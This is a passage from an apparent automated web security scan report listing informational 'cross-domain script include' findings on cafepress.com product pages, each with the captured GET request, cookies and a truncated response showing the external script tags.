GET /+magnets HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 
cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW22 Cteonnt-Length: 59159 Date: Sun, 26 Dec 2010 13:48:26 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:26 GMT; path=/ Set-Cookie: cp_sc=100214; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:26 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 59159 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]... </script><script type="text/javascript" src="http://content0.cpcache.com/js/hoverIntent.minified.js"> </script>...[SNIP]... </div> <script language="javascript" src="http://content7.cpcache.com/marketplace/js/randomSearchRelatedFunctions.js?v=4"> </script>...[SNIP]... <!-- Start Sweepery Offertarget --><script type='text/javascript' src='http://partner.googleadservices.com/gampad/google_service.js'> </script>...[SNIP]...
5.27. http://www.cafepress.com/+mousepads
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /+mousepads
Issue detail
The response dynamically includes the following scripts from other domains:
http://content0.cpcache.com/js/hoverIntent.minified.js
http://content1.cpcache.com/marketplace/js/randomSearchRelatedFunctions.js?v=4
http://partner.googleadservices.com/gampad/google_service.js
Request
GET /+mousepads HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 
cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW17 Cteonnt-Length: 56857 Date: Sun, 26 Dec 2010 13:48:35 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:36 GMT; path=/ Set-Cookie: cp_sc=200051; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:36 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 56857 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]... </script><script type="text/javascript" src="http://content0.cpcache.com/js/hoverIntent.minified.js"> </script>...[SNIP]... </div> <script language="javascript" src="http://content1.cpcache.com/marketplace/js/randomSearchRelatedFunctions.js?v=4"> </script>...[SNIP]... <!-- Start Sweepery Offertarget --><script type='text/javascript' src='http://partner.googleadservices.com/gampad/google_service.js'> </script>...[SNIP]...
5.28. http://www.cafepress.com/+mugs
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /+mugs
Issue detail
The response dynamically includes the following scripts from other domains:
http://content0.cpcache.com/js/hoverIntent.minified.js
http://content1.cpcache.com/marketplace/js/randomSearchRelatedFunctions.js?v=4
http://partner.googleadservices.com/gampad/google_service.js
Request
GET /+mugs HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 
cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW15 Cteonnt-Length: 60077 Date: Sun, 26 Dec 2010 13:47:02 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:02 GMT; path=/ Set-Cookie: cp_sc=100139; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:02 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 60077 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]... </script><script type="text/javascript" src="http://content0.cpcache.com/js/hoverIntent.minified.js"> </script>...[SNIP]... </div> <script language="javascript" src="http://content1.cpcache.com/marketplace/js/randomSearchRelatedFunctions.js?v=4"> </script>...[SNIP]... <!-- Start Sweepery Offertarget --><script type='text/javascript' src='http://partner.googleadservices.com/gampad/google_service.js'> </script>...[SNIP]...
5.29. http://www.cafepress.com/+ornaments
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /+ornaments
Issue detail
The response dynamically includes the following scripts from other domains:
http://content0.cpcache.com/js/hoverIntent.minified.js
http://content2.cpcache.com/marketplace/js/randomSearchRelatedFunctions.js?v=4
http://partner.googleadservices.com/gampad/google_service.js
Request
GET /+ornaments HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 
cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW13 Cteonnt-Length: 58964 Date: Sun, 26 Dec 2010 13:48:41 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:41 GMT; path=/ Set-Cookie: cp_sc=100180; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:41 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 58964 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]... </script><script type="text/javascript" src="http://content0.cpcache.com/js/hoverIntent.minified.js"> </script>...[SNIP]... </div> <script language="javascript" src="http://content2.cpcache.com/marketplace/js/randomSearchRelatedFunctions.js?v=4"> </script>...[SNIP]... <!-- Start Sweepery Offertarget --><script type='text/javascript' src='http://partner.googleadservices.com/gampad/google_service.js'> </script>...[SNIP]...
5.30. http://www.cafepress.com/+posters
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /+posters
Issue detail
The response dynamically includes the following scripts from other domains:
http://content0.cpcache.com/js/hoverIntent.minified.js
http://partner.googleadservices.com/gampad/google_service.js
Request
GET /+posters HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 
cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW28 ntCoent-Length: 65598 Date: Sun, 26 Dec 2010 13:47:15 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:15 GMT; path=/ Set-Cookie: cp_sc=100165; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:15 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 65598 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]... </script><script type="text/javascript" src="http://content0.cpcache.com/js/hoverIntent.minified.js"> </script>...[SNIP]... <!-- Start Sweepery Offertarget --><script type='text/javascript' src='http://partner.googleadservices.com/gampad/google_service.js'> </script>...[SNIP]...
5.31. http://www.cafepress.com/+stadium-blanket
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /+stadium-blanket
Issue detail
The response dynamically includes the following scripts from other domains:
http://content0.cpcache.com/js/hoverIntent.minified.js
http://content4.cpcache.com/marketplace/js/randomSearchRelatedFunctions.js?v=4
http://partner.googleadservices.com/gampad/google_service.js
Request
GET /+stadium-blanket HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 
cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW28 ntCoent-Length: 59409 Date: Sun, 26 Dec 2010 13:48:46 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:45 GMT; path=/ Set-Cookie: cp_sc=201672; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:45 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 59409 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]... </script><script type="text/javascript" src="http://content0.cpcache.com/js/hoverIntent.minified.js"> </script>...[SNIP]... </div> <script language="javascript" src="http://content4.cpcache.com/marketplace/js/randomSearchRelatedFunctions.js?v=4"> </script>...[SNIP]... <!-- Start Sweepery Offertarget --><script type='text/javascript' src='http://partner.googleadservices.com/gampad/google_service.js'> </script>...[SNIP]...
5.32. http://www.cafepress.com/+steins
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /+steins
Issue detail
The response dynamically includes the following scripts from other domains:
http://content0.cpcache.com/js/hoverIntent.minified.js
http://content9.cpcache.com/marketplace/js/randomSearchRelatedFunctions.js?v=4
http://partner.googleadservices.com/gampad/google_service.js
Request
GET /+steins HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; 